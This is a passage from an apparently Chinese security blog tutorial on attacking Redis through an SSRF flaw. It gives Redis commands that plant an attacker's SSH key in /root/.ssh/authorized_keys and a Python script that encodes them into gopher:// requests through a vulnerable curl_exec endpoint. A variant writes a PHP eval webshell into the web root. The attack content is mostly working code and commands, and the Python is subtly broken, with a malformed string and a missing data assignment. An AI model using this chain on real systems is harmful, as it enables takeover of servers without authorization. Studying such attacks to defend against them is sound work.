<pre class="line-numbers language-language-shell"><code class="language-language-shell">margine:.ssh margin$ cat id_rsa.pub  
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>构造payload</p>
<p>，如下：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "ssh-rsa
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-language-shell"><code class="language-language-shell"> AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local"
save
quit
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>进一步得到python代码为：</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.67:6379/_"

# 攻击脚本
"config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local\\n\\n"
save
quit

"""

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

print encoder
# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
print response
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="0x04-写webshell"><a href="#0x04-写webshell" class="headerlink" title="0x04 写webshell"></a><strong>0x04 写webshell</strong></h6><p>经过上面文章的学习，对于写webshell</p>
<p>来说便变得非常简单，要完成此操作，需要两个前提条件</p>
<ul>
<li>当前运行redis的用户在web目录有写权限</li>
<li>知道web目录的绝对路径</li>
</ul>
<p>步骤比较简单，原理还是利用Redis的备份功能，只不过这次是备份成webshell(redis所在的服务器需要phpstudy环境）</p>
<p>修改python中的payload，如下：</p>
<pre><code>"config set dir /var/www/html/
config set dbfilename margin.php
set margin "\\n&lt;?php eval($_POST['margin']);?&gt;\\n"
save
quit

"""
</code></pre>
<p>此处不贴完整的python代码了，执行后可以看到目标主机有了margin.php文件，使用蚁剑连接即可。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">文章</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/links/">友链</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis-%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">Redis 简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis-%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">Redis 命令</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E5%90%AF%E5%8A%A8"><span class="toc-number">2.0.0.0.0.1.</span> <span class="toc-text">本地启动</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%9C%A8%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1%E4%B8%8A%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">2.0.0.0.0.2.</span> <span class="toc-text">在远程服务上执行命令</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%AD%E6%B3%95"><span class="toc-number">2.0.1.</span> <span class="toc-text">语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">2.0.2.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5"><span class="toc-number">3.</span> <span class="toc-text">入侵</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Redis%E5%85%A5%E4%BE%B5%EF%BC%8C%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.0.0.0.0.1.</span> <span class="toc-text">Redis入侵，反弹shell</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Redis%E8%AE%A4%E8%AF%81%E6%94%BB%E5%87%BB"><span class="toc-number">3.0.0.0.0.2.</span> <span class="toc-text">Redis认证攻击</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#0x03-%E5%86%99ssh-keygen%E5%85%AC%E9%92%A5%EF%BC%8C%E4%BD%BF%E7%94%A8%E7%A7%81%E9%92%A5%E7%99%BB%E9%99%86"><span class="toc-number">3.0.0.0.0.3.</span> <span class="toc-text">0x03 写ssh-keygen公钥，使用私钥登陆</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#0x04-%E5%86%99webshell"><span class="toc-number">3.0.0.0.0.4.</span> <span class="toc-text">0x04 写webshell</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&text=SSRF漏洞攻击Redis"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&is_video=false&description=SSRF漏洞攻击Redis"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SSRF漏洞攻击Redis&body=Check out this article: https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&name=SSRF漏洞攻击Redis&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&t=SSRF漏洞攻击Redis"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    YUNiversity
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">文章</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/links/">友链</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


        <style>
            [bg-lazy] {
                background-image: none !important;
                background-color: #eee !important;
            }
        </style>
        <script>
            window.imageLazyLoadSetting = {
                isSPA: false,
                preloadRatio: 1,
                processImages: null,
            };
        </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z\d\-\.\+]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(t.test(e.href)||r.test(e.href))&&(e.href=a.dataset.original)})});</script><script>(r=>{r.imageLazyLoadSetting.processImages=t;var a=r.imageLazyLoadSetting.isSPA,o=r.imageLazyLoadSetting.preloadRatio||1,d=i();function i(){var t=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")),e=Array.prototype.slice.call(document.querySelectorAll("[bg-lazy]"));return t.concat(e)}function t(t){(a||t)&&(d=i());for(var e,n=0;n<d.length;n++)0<=(e=(e=d[n]).getBoundingClientRect()).bottom&&0<=e.left&&e.top<=(r.innerHeight*o||document.documentElement.clientHeight*o)&&(()=>{var t,e,a,o,i=d[n];e=function(){d=d.filter(function(t){return i!==t}),r.imageLazyLoadSetting.onImageLoaded&&r.imageLazyLoadSetting.onImageLoaded(i)},(t=i).dataset.loaded||(t.hasAttribute("bg-lazy")?(t.removeAttribute("bg-lazy"),e&&e()):(a=new Image,o=t.getAttribute("data-original"),a.onload=function(){t.src=o,t.removeAttribute("data-original"),t.setAttribute("data-loaded",!0),e&&e()},a.onerror=function(){t.removeAttribute("data-original"),t.setAttribute("data-loaded",!1),t.src=o},t.src!==o&&(a.src=o)))})()}function e(){clearTimeout(t.tId),t.tId=setTimeout(t,500)}t(),document.addEventListener("scroll",e),r.addEventListener("resize",e),r.addEventListener("orientationchange",e)})(this);</script></body>
</html>
